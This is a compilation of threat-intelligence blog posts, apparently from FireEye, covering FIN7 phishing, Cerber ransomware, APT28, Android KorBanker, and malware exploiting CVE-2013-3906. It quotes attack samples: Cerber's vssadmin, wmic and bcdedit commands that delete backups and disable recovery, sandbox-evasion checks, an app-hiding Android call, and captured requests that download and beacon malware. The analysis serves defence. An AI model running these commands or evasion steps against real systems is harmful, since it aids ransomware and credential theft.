  2. Monitor for registry key creation and/or modification events for the keys of “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom” and “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB”
  3. Monitor process execution events and command line arguments for malicious use of the “sdbinst.exe” utility 

Introducing for macOS

UPDATE 2 (Oct. 24, 2018): now supports macOS 10.14.

UPDATE (April 4, 2018): now supports macOS 10.13.

As a malware analyst or systems programmer, having a suite of solid dynamic analysis tools is vital to being quick and effective. These tools enable us to understand malware capabilities and undocumented components of the operating system. One obvious tool that comes to mind is Procmon from the legendary Sysinternals Suite from Microsoft. Those tools only work on Windows though and we love macOS.

macOS has some fantastic dynamic instrumentation software included with the operating system and Xcode. In the past, we have used dynamic instrumentation tools such as Dtrace, a very powerful tracing subsystem built into the core of macOS. While it is very powerful and efficient, it commonly required us to write D scripts to get the interesting bits. We wanted something simpler.

Today, the Innovation and Custom Engineering (ICE) Applied Research team presents the public release of for macOS, a simple GUI application for monitoring common system events on a macOS host. captures the following event types:

  • Process execution with command line arguments
  • File creates (if data is written)
  • File renames
  • Network activity
  • DNS requests and replies
  • Dynamic library loads
  • TTY Events identifies system activities using a kernel extension (kext). Its focus is on capturing data that matters, with context. These events are presented in the UI with a rich search capability allowing users to hunt through event data for areas of interest.

The goal of Monitor is simplicity. When launching Monitor, the user is prompted for root credentials to launch a process and load our kext (don’t worry, the main UI process doesn’t run as root). From there, the user can click on the start button and watch the events roll in!

The UI is sparse with a few key features. There is the start/stop button, filter buttons, and a search bar. The search bar allows us to set simple filters on types of data we may want to filter or search for over all events. The event table is a listing of all the events Monitor is capable of presenting to the user. The filter buttons allow the user to turn off some classes of events. For example, if a TimeMachine backup were to kick off when the user was trying to analyze a piece of malware, the user can click the file system filter button and the file write events won’t clutter the display.

As an example, perhaps we were interested in seeing any processes that communicated with We can simply use an “Any” filter and enter xkcd into the search bar, as seen in Figure 1.

Figure 1: User Interface

We think you will be surprised how useful Monitor can be when trying to figure out how components of macOS or even malware work under the hood, all without firing up a debugger or D script.

Click here to download Please send any feature requests/bugs to

Apple, Mac and MacOS are registered trademarks or trademarks of Apple Inc.

M-Trends 2017: A View From the Front Lines

Every year Mandiant responds to a large number of cyber attacks, and 2016 was no exception. For our M-Trends 2017 report, we took a look at the incidents we investigated last year and provided a global and regional (the Americas, APAC and EMEA) analysis focused on attack trends, and defensive and emerging trends.

When it comes to attack trends, we’re seeing a much higher degree of sophistication than ever before. Nation-states continue to set a high bar for sophisticated cyber attacks, but some financial threat actors have caught up to the point where we no longer see the line separating the two. These groups have greatly upped their game and are thinking outside the box as well. One unexpected tactic we observed is attackers calling targets directly, showing us that they have become more brazen.

While there has been a marked acceleration of both the aggressiveness and sophistication of cyber attacks, defensive capabilities have been slower to evolve. We have observed that a majority of both victim organizations and those working diligently on defensive improvements are still lacking adequate fundamental security controls and capabilities to either prevent breaches or to minimize the damages and consequences of an inevitable compromise.

Fortunately, we’re seeing that organizations are becoming better are identifying breaches. The global median time from compromise to discovery has dropped significantly from 146 days in 2015 to 99 days 2016, but it’s still not good enough. As we noted in M-Trends 2016, Mandiant’s Red Team can obtain access to domain administrator credentials within roughly three days of gaining initial access to an environment, so 99 days is still 96 days too long.

We strongly recommend that organizations adopt a posture of continuous cyber security, risk evaluation and adaptive defense or they risk having significant gaps in both fundamental security controls and – more critically – visibility and detection of targeted attacks.

On top of our analysis of recent trends, M-Trends 2017 contains insights from our FireEye as a Service (FaaS) teams for the second consecutive year. FaaS monitors organizations 24/7, which gives them a unique perspective into the current threat landscape. Additionally, this year we partnered with law firm DLA Piper for a discussion of the upcoming changes in EMEA data protection laws.

You can learn more in our M-Trends 2017 report. Additionally, you can register for our live webinar on March 29, 2017, to hear more from our experts.

FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings

In late February 2017, FireEye as a Service (FaaS) identified a spear phishing campaign that appeared to be targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. Based on multiple identified overlaps in infrastructure and the use of similar tools, tactics, and procedures (TTPs), we have high confidence that this campaign is associated with the financially motivated threat group tracked by FireEye as FIN7.

FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware. We have observed FIN7 attempt to compromise diverse organizations for malicious operations – usually involving the deployment of point-of-sale malware – primarily against the retail and hospitality industries.

Spear Phishing Campaign

All of the observed intended recipients of the spear phishing campaign appeared to be involved with SEC filings for their respective organizations. Many of the recipients were even listed in their company’s SEC filings. The sender email address was spoofed as EDGAR <> and the attachment was named “Important_Changes_to_Form10_K.doc” (MD5: d04b6410dddee19adec75f597c52e386). An example email is shown in Figure 1.

Figure 1: Example of a phishing email sent during this campaign

We have observed the following TTPs with this campaign:

  • The malicious documents drop a VBS script that installs a PowerShell backdoor, which uses DNS TXT records for its command and control. This backdoor appears to be a new malware family that FireEye iSIGHT Intelligence has dubbed POWERSOURCE. POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams. Using DNS TXT records to communicate is not an entirely new finding, but it should be noted that this has been a rising trend since 2013 likely because it makes detection and hunting for command and control traffic difficult.
  • We also observed POWERSOURCE being used to download a second-stage PowerShell backdoor called TEXTMATE in an effort to further infect the victim machine. The TEXTMATE backdoor provides a reverse shell to attackers and uses DNS TXT queries to tunnel interactive commands and other data. TEXTMATE is “memory resident” – often described as “fileless” malware. This is not a novel technique by any means, but it’s worth noting since it presents detection challenges and further speaks to the threat actor’s ability to remain stealthy and nimble in operations.
  • In some cases, we identified a Cobalt Strike Beacon payload being delivered via POWERSOURCE. This particular Cobalt Strike stager payload was previously used in operations linked to FIN7.
  • We observed that the same domain hosting the Cobalt Strike Beacon payload was also hosting a CARBANAK backdoor sample compiled in February 2017. CARBANAK malware has been used heavily by FIN7 in previous operations.

Thus far, we have directly identified 11 targeted organizations in the following sectors:

  • Financial services, with different victims having insurance, investment, card services, and loan focuses
  • Transportation
  • Retail
  • Education
  • IT services
  • Electronics

All these organizations are based in the United States, and many have international presences. As the SEC is a U.S. regulatory organization, we would expect recipients of these spear phishing attempts to either work for U.S.-based organizations or be U.S.-based representatives of organizations located elsewhere. However, it is possible that the attackers could perform similar activity mimicking other regulatory organizations in other countries.


We have not yet identified FIN7’s ultimate goal in this campaign, as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft.  However, we surmise FIN7 can profit from compromised organizations in several ways. If the attackers are attempting to compromise persons involved in SEC filings due to their information access, they may ultimately be pursuing securities fraud or other investment abuse. Alternatively, if they are tailoring their social engineering to these individuals, but have other goals once they have established a foothold, they may intend to pursue one of many other fraud types.

Previous FIN7 operations deployed multiple point-of-sale malware families for the purpose of collecting and exfiltrating sensitive financial data. The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions, ATM compromise, and other monetization schemes.

Community Protection Event

FireEye implemented a Community Protection Event – FaaS, Mandiant, Intelligence, and Products – to secure all clients affected by this campaign. In this instance, an incident detected by FaaS led to the deployment of additional detections by the FireEye Labs team after FireEye Labs Advanced Reverse Engineering quickly analyzed the malware. Detections were then quickly deployed to the suite of FireEye products.

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the POWERSOURCE and TEXTMATE malware. Click here for more information.

Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

Attack Process

The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

  1. Target receives and opens a Word document.
  2. Macro in document is invoked to run PowerShell in hidden mode.
  3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
  4. On successful connection, the ransomware is written to the disk of the victim.
  5. PowerShell executes the ransomware.
  6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, and runonce registry entries.
  7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
  8. Files are encrypted and messages are presented to the user requesting payment.

Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

PowerShell Abuse

When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

In this case we observed the macrocode calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

Cerber in Action

Initial payload behavior

Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\&#60GUID&#62), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

If the malware is launched from the specific aforementioned folder and after eliminating any blacklisted filenames from an internal list, then the malware creates a renamed copy of itself to “%APPDATA%\&#60GUID&#62” using a pseudo-randomly selected name from the “system32” directory. The malware executes the malware from the new location and then cleans up after itself.

Shadow deletion

As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes using respective arguments:

Vssadmin.exe "delete shadows /all /quiet"

WMIC.exe "shadowcopy delete"

Bcdedit.exe "/set {default} recoveryenabled no"

Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures


People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

Figure 2. A message to the victim after encryption

The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.



Figure 3. Ransom offered to victim, which is discounted for five days

Multilingual Support

As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4.   Interface provided to the victim to pay ransom supports 12 languages


Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as. ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

Selective Targeting

Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers geography: 1049—Russian, ¨ 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri, (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

Anti VM Checks

The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.


Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

  • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
  • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
  • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
  • Common persistence methods such as run and runonce key are also used.
A Solid Defense

Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.


Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

Traditional defenses don’t have the granular view required to do this, nor can they connect the dots of discreet individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has, or is, transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step ahead and contact relevant authorities to bring down these types of campaigns.

Click here for more information about Exploit Guard technology.

APT28: A Window into Russia’s Cyber Espionage Operations?

The role of nation-state actors in cyber attacks was perhaps most widely revealed in February 2013 when Mandiant released the APT1 report, which detailed a professional cyber espionage group based in China. Today we release a new report: APT28: A Window Into Russia’s Cyber Espionage Operations?

This report focuses on a threat group that we have designated as APT28. While APT28’s malware is fairly well known in the cybersecurity community, our report details additional information exposing ongoing, focused operations that we believe indicate a government sponsor based in Moscow.

In contrast with the China-based threat actors that FireEye tracks, APT28 does not appear to conduct widespread intellectual property theft for economic gain. Instead, APT28 focuses on collecting intelligence that would be most useful to a government. Specifically, FireEye found that since at least 2007, APT28 has been targeting privileged information related to governments, militaries and security organizations that would likely benefit the Russian government.

In our report, we also describe several malware samples containing details that indicate that the developers are Russian language speakers operating during business hours that are consistent with the time zone of Russia’s major cities, including Moscow and St. Petersburg. FireEye analysts also found that APT28 has systematically evolved its malware since 2007, using flexible and lasting platforms indicative of plans for long-term use and sophisticated coding practices that suggest an interest in complicating reverse engineering efforts.

We assess that APT28 is most likely sponsored by the Russian government based on numerous factors summarized below:

Table for APT28

FireEye is also releasing indicators to help organizations detect APT28 activity. Those indicators can be downloaded at

As with the APT1 report, we recognize that no single entity completely understands the entire complex picture of intense cyber espionage over many years. Our goal by releasing this report is to offer an assessment that informs and educates the community about attacks originating from Russia. The complete report can be downloaded here: /content/dam/legacy/resources/pdfs/apt28.pdf.

MS Windows Local Privilege Escalation Zero-Day in The Wild

FireEye Labs has identified a new Windows local privilege escalation vulnerability in the wild. The vulnerability cannot be used for remote code execution but could allow a standard user account to execute code in the kernel. Currently, the exploit appears to only work in Windows XP.

This local privilege escalation vulnerability is used in-the-wild in conjunction with an Adobe Reader exploit that appears to target a patched vulnerability. The exploit targets Adobe Reader 9.5.4, 10.1.6, 11.0.02 and prior on Windows XP SP3. Those running the latest versions of Adobe Reader should not be affected by this exploit.

Post exploitation, the shellcode decodes a PE payload from the PDF, drops it in the temporary directory, and executes it.


The following actions will protect users from the in-the-wild PDF exploit:

1) Upgrade to the latest Adobe Reader

2) Upgrade to Microsoft Windows 7 or higher

This post was intended to serve as a warning to the generic public. We are collaborating with the Microsoft Security team on research activities. Microsoft assigned CVE-2013-5065 to this issue.

We will continue to update this blog as new information about this threat is found.

[Update]: Microsoft released security advisory 2914486 on this issue.

Dissecting Android KorBanker

FireEye recently identified a malicious mobile application that installs a fake banking application capable of stealing user credentials. The top-level app acts as a bogus Google Play application, falsely assuring the user that it is benign.

FireEye Mobile Threat Prevention platform detects this application as Android.KorBanker. This blog post details both the top-level installer as well as the fake banking application embedded inside the top-level app.

The app targets the following banks, all of which are based in Korea.

  • Hana Bank
  • IBK One
  • KB Kookmin Bank
  • NH Bank
  • Woori Bank
  • Shinhan Bank

Once installed, the top-level application presents itself as a Google Play application. It also asks the user for permission to activate itself as a device administrator, which gives KorBanker ultimate control over the device and helps the app stay hidden from the app menu.


The user sees the messages in Figure 1 and Figure 2.


The message in Figure 2 translates to: “Notification installation file is corrupt error has occurred. Sure you want to delete the corrupted files?”

When the user clicks taps the “Yes’ button, KorBanker hides itself from the user by calling the following Android API:

getPackageManager().setComponentEnabledSetting(new ComponentName("", ""), 2, 1)

The arguments “2” and “1” which are being passed to the above function are explained below.

The 2 argument represents is the value for the COMPONENT_ENABLED_STATE_DISABLED flag, which causes the component to be disabled from the menu of apps.

The 1 argument is the value for the DONT_KILL_APP flag, which indicates that the app should not be killed and continue running in the background.

After installation, the app checks whether any of the six targeted banking applications have been installed. If it finds any, it deletes the legitimate banking application and silently replaces it with a fake version. The fake versions of the banking applications are embedded in the “assets” directory of the top-level APK.

Initial registration protocol

The top-level APK and the embedded fake banking app register themselves with their respective command-and-control (CnC) servers. The following section explains the registration process.

Top-level app

The top-level app registers itself by sending the device ID of the phone to the remote CnC server packed in a JavaScript Object Notation (JSON) object. The data packet excerpt is shown in Figure 3. This is the first packet that is sent out once the app is installed on the device.


Figure 3: KorBanker data packet during registration

The packet capture shown in Figure 3 shows the structure of the registration message. The bytes highlighted in red indicate the CnC message code of 0x07(decimal 7) which translates to the string addUserReq.

Outlined in yellow is length indicator — 0x71(113 bytes)— followed by the JSON object containing the Device ID and the phone number of the device. The values for callSt and smsSt are statically set to 21 and 11, respectively.

The response bytes shown in black containing 0x04 and 0x01 map to the command addUserAck. They are sent by the server to acknowledge the receipt of the previously sent addUserReq. Code inside the application invokes various functions as it receives commands. These functions may exist for future updates of the application.


Figure 4: KorBanker code for sending incoming messages to CnC server

Once the installation of the app has been registered, the app waits for incoming messages on the phone, possibly looking for access codes that arrive as a part of two factor authentication methods for one of the six targeted banks. All incoming messages to the phone are intercepted and sent to the CnC server on port 8888 as shown in Figure 4.

The bytes highlighted in red after the response show the message code of 0x08 (Decimal 8), which translates to the command addSmsReq. This is followed by the size of the message. The Device ID is sent at the end of the data packet to identify the device from which this message was seen with the timestamp. It also suppresses the SMS notifications from the user and deletes the message from the device.

The remote CnC infrastructure is based on numeric codes. These codes are stored in a data structure in the app. All incoming messages and responses from the CnC server arrive in numeric codes and get translated into corresponding strings, which in turn drive the app to perform different tasks.

Table 1 shows the CnC commands supported by the top-level app. All the commands ending with “Req” correspond to the infected client requests made to the CnC server. All the commands ending with “Ack” indicate acknowledgements of the received commands.


Fake banking app 

The fake banking app once installed registers with a CnC server on a different IP address by sending the HTTP request shown below.


Figure 5: Data capture showing the installation of the fake banking app 

Once the phone is registered, the user is presented with the following fake login page of the banking app, which prompts the user for banking account credentials. All these credentials are stored internally in a JSON object. korbanker_6

The user is then prompted for a SCARD code and 35-digit combination, which is recorded into the JSON and sent out to ‘ as follows:

{ "renzheng" : "1234",

"fenli" : "1234",

"datetime" : "2013-08-12 12:32:32",


"bankinid": '1234',

"jumin": '1234',

"banknum" : '1234',

"banknumpw" : '1234',

"paypw" : 'test',

"scard" : "1234567890",

"sn1" : "1234",

"sn2" : "1234",

"sn3" : "1234",



"sn34" : "1234",

"sn35" : "1234"


The response received is as follows:

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Connection: close

Content-Type: text/html

Date: Fri, 22 Nov 2013 02:05:00 GMT

Expires: Thu, 19 Nov 1981 08:52:00 GMT



This malware sample takes extra measures to obtain banking credentials. With the increased usage of mobile devices and with the liberal permission allotment to apps that appear benign we are now at an increased risk of monetary losses on the mobile front. Mobile banking is not completely void of its adversaries. KorBanker is a vivid reminder of just how dangerous apps from untrusted sources can be.

Monitoring Vulnaggressive Apps on Google Play

Vulnaggressive Characteristics in Mobile Apps and Libraries

FireEye mobile security researchers have discovered a rapidly-growing class of mobile threats represented by popular ad libraries affecting apps with billions of downloads. These ad libraries are aggressive at collecting sensitive data and able to perform dangerous operations such as downloading and running new code on demand. They are also plagued with various classes of vulnerabilities that enable attackers to turn their aggressive behaviors against users. We coined the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics. We have published some of our findings in our two recent blogs about these threats: “Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions” and “Update: Ad Vulna Continues”.

As we reported in our earlier blog “Update: Ad Vulna Continues”, we have observed that some vulnaggressive apps have been removed from Google Play, and some app developers have upgraded their apps to a more secure version either by removing the vulnaggressive libraries entirely or by upgrading the relevant libraries to a more secure version which address the security issues. However, many app developers are still not aware of these security issues and have not taken such needed steps. We need to make a community effort to help app developers and library vendors to be more aware of these security issues and address them in a timely fashion.

To aid this community effort, we present the data to illustrate the changes over time as vulnaggressive apps are upgraded to a more secure version or removed from Google Play after our notification. We summarize our observations below, although we do not have specific information about the reasons that caused these changes we are reporting.

We currently only show the chart for one such vulnaggressive library, AppLovin (previously referred to by us as Ad Vulna for anonymity). We will add the charts for other vulnaggressive libraries as we complete our notification/disclosure process and the corresponding libraries make available new versions that fix the issues.

The Chart of Apps Affected by AppLovin

AppLovin (Vulna)’s vulnerable versions include 3.x, 4.x and 5.0.x. AppLovin 5.1 fixed most of the reported security issues. We urge app developers to upgrade AppLovin to the latest version and ask their users to update their apps as soon as the newer versions are available.

The figure below illustrates the change over time of the status of vulnerable apps affected by AppLovin on Google Play. In particular, we collect and depict the statistics of apps that we have observed on Google Play with at least 100k downloads and with at least one version containing the vulnerable versions of AppLovin starting September 20. Over time, a vulnerable app may be removed by Google Play (which we call “removed apps”, represented in gray), have a new version available on Google Play that addresses the security issues either by removing AppLovin entirely or by upgrading the embedded AppLovin to 5.1 or above (which we call “upgradable apps”, represented in green), or remain vulnerable (which we call “vulnerable apps”, represented in red), as shown in the legend in the chart.

Please note that we started collecting the data of app removal from Google Play on October 20, 2013. Thus, any relevant app removal between September 20 and October 20 will be counted and shown on October 20. Also, for each app included in the chart, Google Play shows a range of its number of downloads, e.g., between 1M and 5M. We use the lower end of the range in our download count so the statistics we show are conservative estimates.


We are glad to see that over time, many vulnerable apps have been either removed from Google Play or have more secure versions available on Google Play. However, apps with hundreds of millions of downloads in total still remain vulnerable. In addition, note that while removing vulnaggressive apps from Google Play prevents more people from being affected, the millions of devices that already downloaded them remain vulnerable since they are not automatically removed from the devices. Furthermore, because many users do not update their downloaded apps often and older versions of Android do not auto-update apps, even after the new, more secure version of a vulnerable app is available on Google Play, millions of users of these apps will remain vulnerable until they update to the new versions of these apps on their devices. FireEye recently announced FireEye Mobile Threat Prevention. It is uniquely capable of protecting its customers from such threats.

Exploit Proliferation: Additional Threat Groups Acquire CVE-2013-3906

Last week, we blogged about a zero-day vulnerability (CVE-2013-3906) that was being used by at least two different threat groups. Although it was the same exploit, the two groups deployed it differently and dropped very different payloads. One group, known as Hangover, engages in targeted attacks, usually, against targets in Pakistan. The second group, known as Arx, used the exploit to spread the Citadel Trojan, and we have found that they are also using the Napolar (aka Solar) malware. [1]

Looking at the time of the first known use of the exploit, we noted that the Arx group appeared to have had access to this exploit prior to the Hangover group. Subsequent research by Kaspersky has found that this exploit was used in July 2013 to spread a cross-platform malware known as Janicab. Interestingly, the Janicab samples have exactly the same CreateDate and ModifyDate as the Arx samples. However, the ZipModifyDate is different. They also contain the same embedded TIFF file (aa6d23cd23b98be964c992a1b048df6f).

While the Janicab activity dates the use of CVE-2013-3906 to July, other groups, including those associated with advanced persistent threat (APT) activity, have now begun to use this exploit as well. We have found that CVE-2013-3906 is now being used to drop Taidoor and PlugX (which we call Backdoor.APT.Kaba). Interestingly, the version of the exploit used contains elements that are consistent with the Hangover implementation. Both the Taidoor and PlugX samples have EXIF data that is consistent with a Hangover sample. In addition, the samples share the same embedded TIFF file (7dd89c99ed7cec0ebc4afa8cd010f1f1).


The Taidoor malware has been used in numerous targeted attacks that typically affect Taiwan-related entities. We recently blogged about modifications that have been made to the Taidoor malware. This new version of Taidoor is being dropped by malicious documents using the CVE-2013-3906 exploit. The malware is being distributed via an email purporting to be from a Taiwanese government email address.


The Taidoor sample we analyzed (6003b22d22af86026afe62c39316b9e0) has the same CreateDate and ModifyDate as the Hangover samples we analyzed. It also shares an exact ZipModifyDate with one of the Hangover samples. (There are variations in the ZipModifyDate among the Hangover samples).

  • CreateDate                : 2013:10:03 22:46:00Z
  • ModifyDate                : 2013:10:03 23:17:00Z
  • ZipModifyDate           : 2013:10:17 14:21:23

It also contains other EXIF data that matches a Hangover sample (and the PlugX sample discussed below):

  • App Version                     : 12.0000
  • Creator                            : Win7
  • Last Modified By              : Win7
  • Revision Number             : 1

The sample also contains the same embedded TIFF file (7dd89c99ed7cec0ebc4afa8cd010f1f1). This indicates that they were probably built with the same weaponizer tool.

After the exploit is triggered a connection is made to a retrieve an EXE from a webserver:

GET /o.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


Connection: Keep-Alive

This EXE is Taidoor and it is configured to beacon to two command and control (CnC) servers: and

GET /user.jsp?ij=oumded191138F9744C HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


Connection: Keep-Alive

Cache-Control: no-cache

GET /parse.jsp?js=iwmnxw191138F9744C HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


Connection: Keep-Alive

Cache-Control: no-cache

We have located an additional sample (5c8d7d4dd6cc8e3b0bd6587221c52102) that also retrieves Taidoor:

GET /suv/update.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


Connection: Keep-Alive

This sample beacons to the command and control server: (

GET /parse.jsp?ne=vyhavf191138F9744C HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


Connection: Keep-Alive

Cache-Control: no-cache

PlugX (Kaba)

The PlugX malware (aka Backdoor.APT.Kaba) has been used in a variety of targeted attacks. We located a malicious document (80c8ce1fd7622391cac892be4dbec56b) that exploits CVE-2013-3906. This sample contains the same CreateDate and ModifyDate and shares a common ZipModifyDate with both the Taidoor samples and one of the Hangover samples.

  • CreateDate                : 2013:10:03 22:46:00Z
  • ModifyDate                : 2013:10:03 23:17:00Z
  • ZipModifyDate           : 2013:10:17 14:21:23

After exploitation, there is a connection to ( that downloads a PlugX executable:

GET /css/css.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


The malware (423eaeff2a4576365343e6dc35d22042) begins to beacon to and, which both resolve to The callback of the PlugX samples is:

POST /8A8DAEE657205D651405D7CD HTTP/1.1

Accept: */*

FZLK1: 0

FZLK2: 0

FZLK3: 61456

FZLK4: 1

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)


